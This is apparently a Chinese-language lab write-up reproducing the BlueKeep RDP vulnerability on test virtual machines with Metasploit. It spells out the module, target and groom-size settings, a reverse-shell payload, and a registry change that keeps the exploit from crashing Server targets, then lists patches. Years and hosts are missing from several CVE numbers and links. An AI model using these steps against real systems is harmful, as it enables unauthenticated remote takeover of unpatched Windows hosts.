0x00 漏洞描述
5月14日,微软发布了本月安全更新补丁,其中包含一个RDP(远程桌面服务)远程代码执行漏洞的补丁更新,对应CVE编号:CVE--0708,相关信息链接:
https://portal./en-US/security-guidance/advisory/CVE--0708https://blogs./msrc//05/14/prevent-a-worm-by-updating-remote-desktop-services-cve--0708/
CVE--0708是微软发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。
09月07日,@rapid7 在其metasploit-framework仓库公开发布了CVE--0708的利用模块,漏洞利用工具已经开始扩散,已经构成了蠕虫级的攻击威胁
0x01 影响版本
Windows 7Windows Server R2Windows Server Windows Server Windows XP
0x02 漏洞原理
该漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。
这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索病毒永恒之蓝差不多。
CVE--0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。
9月7日晚上凌晨1点左右,metaspolit更新了漏洞利用程序。
未经身份验证的攻击者利用该漏洞,向目标Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。
0x03 环境搭建与准备
本次复现版本为Windows 7 sp1和Windows Server R2
Windows 7 sp1:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/Windows Server R2:ed2k://|file|cn_windows_server__r2_standard_enterprise_datacenter_and_web_with_sp1_vl_build_x64_dvd_617396.iso|3368962048|7C210CAC37A05F459758BCC1F4478F9E|/
Vmware版本15
msf升级
msf升级很简单,打开终端输入下面两条命令即可apt-get updateapt-get install metasploit-framework
启动msfconsole
search 0708 搜索0708的位置use exploit/windows/rdp/cve__0708_bluekeep_rce 使用这个模块
Show options ##查看设置情况
info ##查看基本信息情况可见关键设置主要为RHOSTS、RPORT 、 target使用set RHOSTS 受害机IP设置受害机IP使用set RPORT 受害机PORT设置受害机RDP端口号(默认3389)使用set target ID数字(可选为0-7)设置受害机机器架构这里我们使用的是VMware 15,那么target 4满足条件使用exploit或者run开始攻击,等待建立连接。
Show payloads ##查看payload,set payload ... 可进行设置payload
Show advanced ##查看高级选项的参数, 其中groomsize 默认250MB,ForceExploit 默认false 也可以set ForceExploit true 设置为true。Show -h ##查看帮助
Windows 7 sp1的准备工作
Win7--IP地址为:192.168.80.131,内存4g开启3389端口,并且关闭防火墙,kali与win7之间能相互ping通。带宽不受限。
0x04 测试
set payload windows/x64/messagebox这个payload是在靶机上弹出一个窗口。在执行run后,可看到win7靶机上弹出窗口,如下图:set rhosts 192.168.80.131set target 3 ####今天target为4 时,无法成功,但是昨天target等于4时还能行,并且我的vmware为15。target参数的设置需要自己多切换不同的参数试试。run
set payload generic/shell_reverse_tcp 设置payload为generic/shell_reverse_tcp
可以看到在终端中输入ipconfig后,回显192.168.80.131
见解分析
在传送250MB包,网速不受限制的情况下,网速最高达到48MB/s,但是现实中这个不可能达到的情况,现实中顶多也就是10MB/s左右,这个原因是这个漏洞无法利用的重要原因。Rdp协议连接超过30s左右(自己数的,具体协议上怎么规定的没有看)就会被断开。250MB包要在30s左右发出去。那就需要9MB/s左右的网速。但是现实不太可能实现。Metasploit中的这个脚本是rb语言,环境不太通用,缺乏移植性,这也是一个原因。若是把rb语言换成python会好点,但这不是主要原因,主要原因还是rdp协议自动断开的问题。
出错的情况
这种情况下,靶机被打倒蓝屏。
这是与靶机之间ping不通,或者靶机防火墙没有关闭。
进一步测试
接下来调整带宽,与groomsize的大小。再次进行测试。
带宽100MbpsSet GROOMSIZE 100
最高达到14MiB/s,成功。
带宽45MbpsSet GROOMSIZE 80
最高达到5.9MiB/s,成功。
带宽在45Mbps情况下,Set GROOMSIZE 40
最高达到5.9MiB/s,成功。
带宽在45Mbps情况下,Set GROOMSIZE 30
最高达到5.9MiB/s,成功。
再次减小GROOMSIZE或带宽的值就不行了。
当然带宽也可以自定义。
Windows Server R2的准备工作
win server --IP地址为:192.168.80.130,内存2g开启3389端口,并且关闭防火墙,kali与win server 之间能相互ping通。带宽不受限。
当时测试时候没有成功,老是蓝屏(真是永恒之蓝啊),后来请教了别人说是修改注册表。
Win + R 输入 regedit 进入注册表编辑器,按以下目录找到 fDisableCam 并将值改为0HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
0x05 总结
这篇文章写得还不是很好,有些地方的截图没截取,见解分析那一块也是向大佬学习才熟知的。
win server 也没有再去测试,只是知道了要修改注册表的地方,等我测试好了再把图补上。
现在exp不是很稳定,很难在实战中利用,事无绝对,说不定就有大佬牛人已经吃到肉了。2333
tips:若是不成功的话payload与target多尝试几个。总会成功的
参考链接:/-mo-/p/11483820.html
0x06 修复方式
下载补丁:
Windows 7 sp1:/d/msdownload/update/software/secu//05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msuWindows Server R2:/c/msdownload/update/software/secu//05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
